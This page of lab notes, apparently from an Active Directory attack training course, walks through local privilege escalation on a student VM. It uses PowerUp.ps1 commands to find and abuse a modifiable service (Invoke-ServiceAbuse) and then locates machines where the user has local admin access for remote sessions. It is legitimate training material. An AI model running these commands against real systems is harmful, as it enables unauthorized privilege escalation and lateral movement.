search

Obj 5 Local Priv Esc

Task - Elevate local privs on studentvm, Identify where we have local admin access.

circle-check

We will be using PowerUp.ps1 for this objective

hashtag
Find Unquoted service paths

Get-ServiceUnquoted

hashtag
Find service files we can modify

Get-ModifiableServiceFile -Verbose

hashtag
Find services we can modify

Get-ModifiableService

hashtag
Abuse a service we found to be modifiable

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'
circle-exclamation

Once we abuse this service we need to log off and back on for the escalation to take affect.

hashtag
Find where we have local admin access

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
circle-exclamation

We can now use winrs or PSSremoting to access any machines listed from the command above.

hashtag
PSSremote into another machine as local admin

hashtag
Jenkins....

Coming soon...

PreviousObj 4 EnumerationNextObj 6 BloodHound

Last updated